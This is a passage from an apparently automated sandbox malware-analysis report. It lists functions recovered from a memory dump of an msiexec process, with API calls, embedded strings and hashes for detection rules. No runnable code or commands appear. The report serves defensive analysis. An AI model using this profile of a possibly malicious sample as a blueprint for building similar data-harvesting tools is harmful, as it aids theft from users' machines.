                                                                                                                                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                • API String ID: 3510742995-272990098
                                                                                                                                                • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                Function 0040C3C3 Relevance: 7.6, APIs: 5, Instructions: 109registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                  • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                                                • memset.MSVCRT ref: 0040C439
                                                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free$EnumValuememset$_wcsuprmemcpywcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1265369119-0
                                                                                                                                                • Opcode ID: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                                                                                                                • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                • Opcode Fuzzy Hash: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                                                                                                                • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0044A6EB
                                                                                                                                                • memset.MSVCRT ref: 0044A6FB
                                                                                                                                                • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                • String ID: gj
                                                                                                                                                • API String ID: 1297977491-4203073231
                                                                                                                                                • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                                                                                • free.MSVCRT ref: 0040E9D3
                                                                                                                                                  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@$free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2241099983-0
                                                                                                                                                • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                                                                • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                                                                • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                • malloc.MSVCRT ref: 004174BD
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                • free.MSVCRT ref: 004174E4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4053608372-0
                                                                                                                                                • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                                                • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                                                • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4247780290-0
                                                                                                                                                • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                • memset.MSVCRT ref: 004450CD
                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                  • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1471605966-0
                                                                                                                                                • Opcode ID: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                                                                                                • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                • Opcode Fuzzy Hash: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                                                                                                • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                  • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                                                                  • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                • String ID: \StringFileInfo\
                                                                                                                                                • API String ID: 102104167-2245444037
                                                                                                                                                • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                                                • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                                                Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memicmpwcslen
                                                                                                                                                • String ID: @@@@$History
                                                                                                                                                • API String ID: 1872909662-685208920
                                                                                                                                                • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                                                                • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                                                                Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004100FB
                                                                                                                                                • memset.MSVCRT ref: 00410112
                                                                                                                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                • String ID: </%s>
                                                                                                                                                • API String ID: 3400436232-259020660
                                                                                                                                                • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                                • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                                Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040D58D
                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                • String ID: caption
                                                                                                                                                • API String ID: 1523050162-4135340389
                                                                                                                                                • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                                                • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                                                Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                • String ID: MS Sans Serif
                                                                                                                                                • API String ID: 210187428-168460110
                                                                                                                                                • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                                • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ClassName_wcsicmpmemset
                                                                                                                                                • String ID: edit
                                                                                                                                                • API String ID: 2747424523-2167791130
                                                                                                                                                • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                                                                • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                                                                Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                • API String ID: 3150196962-1506664499
                                                                                                                                                • Opcode ID: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                                                                • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                                                                • Opcode Fuzzy Hash: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                                                                • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                                                                Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                                                                • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                                                                • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                                                                • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                                                                • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memcmp
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3384217055-0
                                                                                                                                                • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                                                • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                                                Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$memcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 368790112-0
                                                                                                                                                • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                                                                • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                                                                Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                                                  • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                                                  • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                                                  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                                                  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                                                • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                                                • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                                                • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                                                • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
